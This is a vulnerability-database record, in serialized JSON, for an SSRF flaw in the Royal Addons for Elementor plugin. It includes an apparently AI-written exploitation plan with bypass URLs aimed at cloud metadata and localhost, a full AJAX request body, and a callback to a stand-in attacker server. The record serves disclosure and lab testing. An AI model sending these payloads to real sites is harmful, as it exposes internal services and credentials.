[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fs_HKm-dPh_l3Yzay01jf8dvPZiBa-OjsahBnSsIpqEA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-6229","royal-addons-for-elementor-authenticated-contributor-server-side-request-forgery-via-csv-url-parameter","Royal Addons for Elementor \u003C= 1.7.1057 - Authenticated (Contributor+) Server-Side Request Forgery via CSV URL Parameter","The Royal Elementor Addons plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.7.1057. This is due to insufficient validation of user-supplied URLs in the render_csv_data() function, which can be bypassed by including 'docs.google.com\u002Fspreadsheets' in a query parameter, and the subsequent use of these URLs in fopen() calls without blocking internal or private network addresses. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to make requests to arbitrary URLs and retrieve sensitive information from internal services.","royal-elementor-addons",null,"\u003C=1.7.1057","1.7.1058","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2026-05-01 00:00:00","2026-05-02 07:46:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9744055a-b199-4945-afcc-4f5b85f5f1e8?source=api-prod",1,[22,23,24,25],"admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php","readme.txt","wpr-addons.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-6229\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (versions \u003C= 1.7.1057) contains a Server-Side Request Forgery (SSRF) vulnerability in its **Data Table** widget. The vulnerability exists in the `render_csv_data()` function (located in `modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php`). \n\nThe plugin attempts to validate that a user-provided CSV URL is hosted on Google Sheets by checking for the string `docs.google.com\u002Fspreadsheets`. However, this check is insufficient as it can be bypassed by appending the string as a query parameter to an arbitrary URL. The plugin then passes this URL to `fopen()`, allowing an authenticated attacker (Contributor+) to make requests to internal network resources and potentially retrieve sensitive data.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `POST \u002Fwp-admin\u002Fadmin-ajax.php` (via Elementor's `render_widget` or `editor_save` actions) or via the frontend by viewing a post containing the widget.\n- **Vulnerable Action**: `elementor_ajax` (standard Elementor AJAX handler).\n- **Vulnerable Parameter**: `settings[csv_url]` (or similar setting name for the CSV data source in the `wpr-data-table` widget).\n- **Authentication**: Authenticated (Contributor level or higher) is required to edit posts and add widgets.\n- **Preconditions**: The \"Data Table\" widget must be added to an Elementor-enabled post\u002Fpage, and the \"Data Type\" (`choose_table_type`) must be set to the CSV option (internal ID `pro-cv`).\n\n## 3. Code Flow\n1. **Entry Point**: A user with Contributor+ permissions edits an Elementor page or sends a direct AJAX request to render a widget.\n2. **Widget Execution**: The `Wpr_Data_Table` class (in `modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php`) is instantiated.\n3. **Render Logic**: The `render()` method is called. If the `choose_table_type` setting is set to `pro-cv`, it invokes `render_csv_data()`.\n4. **Vulnerable Function**: `render_csv_data($settings)` (inferred function name from description).\n5. **Insufficient Validation**: \n   ```php\n   \u002F\u002F Conceptual logic based on vulnerability description\n   $url = $settings['csv_url']; \n   if ( strpos( $url, 'docs.google.com\u002Fspreadsheets' ) !== false ) {\n       $handle = fopen( $url, 'r' ); \u002F\u002F SSRF Sink\n       \u002F\u002F ... processing CSV data\n   }\n   ```\n6. **SSRF Sink**: `fopen($url, 'r')` is called with the attacker-controlled URL. Since internal IPs are not blocked, the request is made by the server.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own AJAX infrastructure. To interact with the Elementor editor API as a Contributor:\n1. 
**Create Page**: Use WP-CLI to create a page with Elementor enabled, or simply a page that the Contributor can edit.\n   ```bash\n   wp post create --post_type=page --post_title=\"SSRF Lab\" --post_status=publish --post_author=CONTRIBUTOR_ID\n   ```\n2. **Access Editor**: Navigate to the Elementor editor URL for that page: `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n3. **Extract Nonce**: Elementor stores its AJAX nonce in the `elementorCommon` or `elementorConfig` object.\n   - Use `browser_eval`: `window.elementorConfig?.ajax?.nonce` or `window.elementorCommon?.config?.ajax?.nonce`.\n4. **Alternative**: If exploiting via the `render_widget` action, the nonce is often found in the page source of the editor.\n\n## 5. Exploitation Strategy\n\n### Step 1: Craft the SSRF Payload\nTo bypass the domain check, append the required string as a parameter:\n- **Target**: Internal Metadata Service (e.g., `http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F`)\n- **Payload**: `http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F?x=docs.google.com\u002Fspreadsheets`\n- **Target (Local)**: `http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F`\n- **Payload**: `http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F?docs.google.com\u002Fspreadsheets`\n\n### Step 2: Trigger SSRF via Elementor AJAX\nWe will use the `elementor_ajax` action to force the server to render the widget with our malicious settings.\n\n**Request**:\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=elementor_ajax&\n  
actions={\"render_widget\":{\"action\":\"render_widget\",\"data\":{\"editorPostId\":POST_ID,\"widgetId\":\"random-id\",\"model\":{\"id\":\"random-id\",\"elType\":\"widget\",\"widgetType\":\"wpr-data-table\",\"settings\":{\"choose_table_type\":\"pro-cv\",\"csv_url\":\"http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F?docs.google.com\u002Fspreadsheets\"}}}}}&\n  _nonce=EXTRACTED_NONCE\n  ```\n\n### Step 3: Capture Response\nThe plugin will attempt to parse the response from `127.0.0.1` as a CSV. If the internal service returns content, it may be reflected in the AJAX response under the `render_widget` data key, likely inside an HTML `\u003Ctable>` structure.\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Ensure `royal-elementor-addons` v1.7.1057 is installed.\n2. **User Creation**: Create a Contributor user.\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n3. **Internal Target**: Ensure there is an internal service to hit (e.g., a simple local listener or the default WordPress login page on `127.0.0.1`).\n\n## 7. Expected Results\n- **Success**: The server response contains the HTML\u002Fcontent of the internal URL provided in `csv_url`, which the plugin attempts to render as table cells. For example, if hitting a local web server, you might see fragments of HTML within `\u003Ctd>` tags in the JSON response.\n- **Verification**: The HTTP logs of the internal service (if accessible) should show a request originating from the WordPress server's IP with the User-Agent associated with PHP's `fopen` (often empty or the server's default).\n\n## 8. Verification Steps\n1. **Monitor Outbound Traffic**: Use a tool like `tcpdump` or a webhook service (e.g., `webhook.site`) if testing external SSRF.\n   - Payload: `http:\u002F\u002FATTACKER_SERVER\u002F?docs.google.com\u002Fspreadsheets`\n2. 
**Check Table Output**: Use WP-CLI to check the post content, if the widget was saved:\n   ```bash\n   wp post get POST_ID --field=post_content\n   ```\n3. **Error Logs**: Check `wp-content\u002Fdebug.log`. If the internal service doesn't return valid CSV data, `fgetcsv()` might trigger warnings visible in the log.\n\n## 9. Alternative Approaches\n- **Save and View**: Instead of the `render_widget` AJAX action, use the `editor_save_builder` action to save the malicious settings to a post, then view the post on the frontend as an unauthenticated user (if published) to see if the SSRF triggers and renders data.\n- **Protocol Smuggling**: If `fopen` is used, check if other wrappers like `php:\u002F\u002Ffilter` are allowed (though `strpos` usually restricts this unless the attacker finds a clever way to include the Google string).\n- **Pro Bypass**: If the \"Pro\" check is enforced server-side, the attacker may need to find a way to set the `choose_table_type` to `pro-cv` by manipulating the JSON payload sent to the Elementor `save_builder` action, as the server-side code for rendering CSVs is often present in the free version.","gemini-3-flash-preview","2026-05-04 17:32:41","2026-05-04 17:33:11",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.7.1057","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1058","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1058.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]